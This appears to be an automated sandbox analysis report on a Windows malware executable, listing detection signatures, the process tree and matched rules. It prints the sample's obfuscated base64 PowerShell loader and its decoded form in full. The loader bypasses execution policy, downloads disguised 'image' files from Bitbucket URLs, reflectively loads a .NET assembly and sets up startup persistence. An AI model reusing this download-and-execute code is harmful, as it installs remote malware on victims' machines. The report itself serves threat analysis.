Windows Analysis Report
nTHivMbGpg.exe

Overview

General Information

Sample name: nTHivMbGpg.exe
renamed because original name is a hash value
Original sample name: e60cc4cdd031cca383ae7d7449eda37dd72d4ef864816d452a7df72a9d019337.exe
Analysis ID: 1524410
MD5: 8d797e4c1866e6542705a564b7fda527
SHA1: 207db5ae1e14888dc1b2d552ba49d45b7cc3b48f
SHA256: e60cc4cdd031cca383ae7d7449eda37dd72d4ef864816d452a7df72a9d019337
Tags: 104-21-81-233, exe, user-JAMESWT_MHT
Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Powershell download and load assembly
Sigma detected: Powershell download payload from hardcoded c2 list
Yara detected Powershell download and execute
AI detected suspicious sample
Bypasses PowerShell execution policy
Found suspicious powershell code related to unpacking or dynamic code loading
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Suspicious powershell command line found
Binary contains a suspicious time stamp
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain checking for process token information
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: Use Short Name Path in Command Line
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • nTHivMbGpg.exe (PID: 1664 cmdline: "C:\Users\user\Desktop\nTHivMbGpg.exe" MD5: 8D797E4C1866E6542705A564B7FDA527)
    • cmd.exe (PID: 7120 cmdline: cmd /c 124.bat MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 3724 cmdline: powershell "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#Gg#ZwBk#GY#a#Bk#GY#ZwBk#C8#d#Bl#HM#d##v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#bgBl#Hc#XwBp#G0#YQBn#GU#Mg#u#Go#c#Bn#D8#MQ#0#DQ#Ng#x#Dc#Mg#x#Cc#L##g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#GI#aQB0#GI#dQBj#Gs#ZQB0#C4#bwBy#Gc#LwBo#Gc#Z#Bm#Gg#Z#Bm#Gc#Z##v#HQ#ZQBz#HQ#LwBk#G8#dwBu#Gw#bwBh#GQ#cw#v#G4#ZQB3#F8#aQBt#GE#ZwBl#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#H
g#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#YgBh#HM#ZQ#2#DQ#T#Bl#G4#ZwB0#Gg#I##9#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bi#GE#cwBl#DY#N#BD#G8#bQBt#GE#bgBk#C##PQ#g#CQ#aQBt#GE#ZwBl#FQ#ZQB4#HQ#LgBT#HU#YgBz#HQ#cgBp#G4#Zw#o#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##s#C##J#Bi#GE#cwBl#DY#N#BM#GU#bgBn#HQ#a##p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bj#G8#bQBt#GE#bgBk#EI#eQB0#GU#cw#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#QwBv#G4#dgBl#HI#d#Bd#Do#OgBG#HI#bwBt#EI#YQBz#GU#Ng#0#FM#d#By#Gk#bgBn#Cg#J#Bi#GE#cwBl#DY#N#BD#G8#bQBt#GE#bgBk#Ck#Ow#g#CQ#b#Bv#GE#Z#Bl#GQ#QQBz#HM#ZQBt#GI#b#B5#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBS#GU#ZgBs#GU#YwB0#Gk#bwBu#C4#QQBz#HM#ZQBt#GI#b#B5#F0#Og#6#Ew#bwBh#GQ#K##k#GM#bwBt#G0#YQBu#GQ#QgB5#HQ#ZQBz#Ck#Ow#g#CQ#d#B5#H##ZQ#g#D0#I##k#Gw#bwBh#GQ#ZQBk#EE#cwBz#GU#bQBi#Gw#eQ#u#Ec#ZQB0#FQ#eQBw#GU#K##n#HQ#ZQBz#HQ#c#Bv#Hc#ZQBy#HM#a#Bl#Gw#b##u#Eg#bwBt#GU#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#bQBl#HQ#a#Bv#GQ#I##9#C##J#B0#Hk#c#Bl#C4#RwBl#HQ#TQBl#HQ#a#Bv#GQ#K##n#Gw#YQ#n#Ck#LgBJ#G4#dgBv#Gs#ZQ#o#CQ#bgB1#Gw#b##s#C##WwBv#GI#agBl#GM#d#Bb#F
0#XQ#g#Cg#JwB0#Hg#d##u#H##bgBn#FM#bwBl#G0#LwBz#GQ#YQBv#Gw#bgB3#G8#Z##v#HI#ZwBm#GQ#LwB3#Gc#Z#Bz#C8#ZwBy#G8#LgB0#GU#awBj#HU#YgB0#Gk#Yg#v#C8#OgBz#H##d#B0#Gg#Jw#s#C##Jw#w#Cc#L##g#Cc#UwB0#GE#cgB0#HU#c#BO#GE#bQBl#Cc#L##g#Cc#UgBl#Gc#QQBz#G0#Jw#s#C##Jw#w#Cc#KQ#p#H0#fQ#=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string($codigo.replace('#','A')));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • powershell.exe (PID: 2412 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/hgdfhdfgd/test/downloads/new_image2.jpg?14461721', 'https://bitbucket.org/hgdfhdfgd/test/downloads/new_image.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.pngSoem/sdaolnwod/rgfd/wgds/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • rundll32.exe (PID: 7244 cmdline: "C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\" MD5: EF3179D498793BF4234F708D3BE28633)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
Source: Process Memory Space: powershell.exe PID: 3724 | Rule: JoeSecurity_PowershellDownloadAndExecute | Description: Yara detected Powershell download and execute | Author: Joe Security
    Source: Process Memory Space: powershell.exe PID: 3724 | Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | Author: ditekSHen
    • 0x612b8:$b2: ::FromBase64String(
    • 0xb1aef:$b2: ::FromBase64String(
    • 0xb1900:$b3: ::UTF8.GetString(
    • 0x36c2a:$s1: -join
    • 0xbbecb:$s1: -join
    • 0x3531:$s3: reverse
    • 0xed6f:$s3: reverse
    • 0x84ccb:$s3: reverse
    • 0x8b79e:$s3: reverse
    • 0xd1dfd:$s3: reverse
    • 0xd8a52:$s3: reverse
    • 0xdaa39:$s3: reverse
    • 0xe5a68:$s3: reverse
    • 0x12c826:$s3: reverse
    • 0x12cb14:$s3: reverse
    • 0x12d22e:$s3: reverse
    • 0x12d9e7:$s3: reverse
    • 0x134ad2:$s3: reverse
    • 0x134eec:$s3: reverse
    • 0x135a74:$s3: reverse
    • 0x136721:$s3: reverse
    Source: Process Memory Space: powershell.exe PID: 2412 | Rule: JoeSecurity_PowershellDownloadAndExecute | Description: Yara detected Powershell download and execute | Author: Joe Security
      Source: Process Memory Space: powershell.exe PID: 2412 | Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | Author: ditekSHen
      • 0x358a9:$b2: ::FromBase64String(
      • 0xa3319:$b2: ::FromBase64String(
      • 0xe058a:$b2: ::FromBase64String(
      • 0xe772e:$b2: ::FromBase64String(
      • 0xe83d7:$b2: ::FromBase64String(
      • 0x1d573a:$b2: ::FromBase64String(
      • 0x1f5629:$b2: ::FromBase64String(
      • 0x28f36e:$b2: ::FromBase64String(
      • 0x2cf13d:$b2: ::FromBase64String(
      • 0x2d3e48:$b2: ::FromBase64String(
      • 0x356ba:$b3: ::UTF8.GetString(
      • 0xa312a:$b3: ::UTF8.GetString(
      • 0xe039b:$b3: ::UTF8.GetString(
      • 0xe753f:$b3: ::UTF8.GetString(
      • 0xe81e8:$b3: ::UTF8.GetString(
      • 0x1d554b:$b3: ::UTF8.GetString(
      • 0x1f543a:$b3: ::UTF8.GetString(
      • 0x28f17f:$b3: ::UTF8.GetString(
      • 0x2cef4e:$b3: ::UTF8.GetString(
      • 0x2d3c59:$b3: ::UTF8.GetString(
      • 0x4d8b8:$s1: -join
      Source | Rule | Description | Author | Strings
      Source: amsi64_2412.amsi.csv | Rule: JoeSecurity_PowershellDownloadAndExecute | Description: Yara detected Powershell download and execute | Author: Joe Security

        Spreading

        barindex
        Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/hgdfhdfgd/test/downloads/new_image2.jpg?14461721', 'https://bitbucket.org/hgdfhdfgd/test/downloads/new_image.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.pngSoem/sdaolnwod/rgfd/wgds/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { 
return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/hgdfhdfgd/test/downloads/new_image2.jpg?14461721', 'https://bitbucket.org/hgdfhdfgd/test/downloads/new_image.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes

        System Summary

        barindex
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#Gg#ZwBk#GY#a#Bk#GY#ZwBk#C8#d#Bl#HM#d##v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#bgBl#Hc#XwBp#G0#YQBn#GU#Mg#u#Go#c#Bn#D8#MQ#0#DQ#Ng#x#Dc#Mg#x#Cc#L##g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#GI#aQB0#GI#dQBj#Gs#ZQB0#C4#bwBy#Gc#LwBo#Gc#Z#Bm#Gg#Z#Bm#Gc#Z##v#HQ#ZQBz#HQ#LwBk#G8#dwBu#Gw#bwBh#GQ#cw#v#G4#ZQB3#F8#aQBt#GE#ZwBl#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#B
u#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#YgBh#HM#ZQ#2#DQ#T#Bl#G4#ZwB0#Gg#I##9#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#C##J#Bz#HQ#YQ
        Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/hgdfhdfgd/test/downloads/new_image2.jpg?14461721', 'https://bitbucket.org/hgdfhdfgd/test/downloads/new_image.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.pngSoem/sdaolnwod/rgfd/wgds/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links 
-Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/hgdfhdfgd/test/downloads/new_image2.jpg?14461721', 'https://bitbucket.org/hgdfhdfgd/test/downloads/new_image.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b